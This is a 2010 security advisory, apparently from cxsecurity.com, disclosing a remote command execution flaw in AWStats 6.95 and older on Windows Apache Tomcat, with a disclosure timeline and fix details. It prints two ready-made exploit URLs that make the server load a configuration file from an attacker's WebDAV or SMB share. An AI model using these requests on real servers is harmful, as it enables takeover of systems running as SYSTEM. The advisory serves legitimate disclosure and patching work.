AWStats 6.95 and Older Remote Command Execution When Installed on Windows Apache Tomcat

2010.12.03
Credit: StenoPlasma
Risk: High
Local: No
Remote: Yes
CWE: CWE-94

TITLE: AWStats 6.95 and Older Remote Command Execution When Installed on Windows Apache Tomcat SUMMARY AND IMPACT: AWStats is vulnerable to remote command execution when installed on Apache Tomcat on Microsoft Windows operating systems. This issue is due to the way Apache Tomcat handles "\\" when specifying a configuration file directory. On a Windows XP AWStats system, an attacker can tell the remote server to call back to a WEBDAV enabled directory to pull the attacker's AWStats configuration file due to the "WebFolder" ability of the operating system. On a Windows 2003 or XP system, an attacker can tell the remote server to call back to a public SMB file share to pull the attacker's AWStats configuration file. The attacker's AWStats configuration file can contain arbitrary commands to be run on the vulnerable remote server as the web service account (The default web service account on Windows with Tomcat is the built in SYSTEM account). An attacker can use this exploit to gain administrative control of a DMZ web server or a web server that has ties to an internal network. DETAILS: Use the following steps to exploit this vulnerability. Attacking Windows XP Apache Tomcat AWStats Server: http://VulnerableServer:8080/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav Attacking Windows 2003 or Windows XP AWStats Server: http://VulnerableServer:8080/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share VULNERABLE PRODUCTS: AWStats Log Analyzer 6.95 and Older (AWStats 7.0 was fixed on 2010/08/18 10:49:50 - http://awstats.sourceforge.net/docs/awstats_changelog.txt) running on Windows XP or Windows 2003 (Other Windows OS versions have not been tested). AWStats must be installed on top of Apache Tomcat (All Versions). REFERENCES AND ADDITIONAL INFORMATION: N/A CREDITS: StenoPlasma (at) ExploitDevelopment.com TIMELINE: Discovery: May 1, 2010 Vendor Notified: May 16, 2010 Vendor Fixed: August 18, 2010 Vendor Notified of Disclosure: October 26, 2010 Disclosure to CERT: November 3, 2010 VENDOR URL: http://awstats.sourceforge.net ADVISORY URL: http://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-001.html VENDOR ADVISORY URL: http://awstats.sourceforge.net/docs/awstats_changelog.txt

References:

http://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-001.html
http://awstats.sourceforge.net/docs/awstats_changelog.txt
http://www.kb.cert.org/vuls/id/870532


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top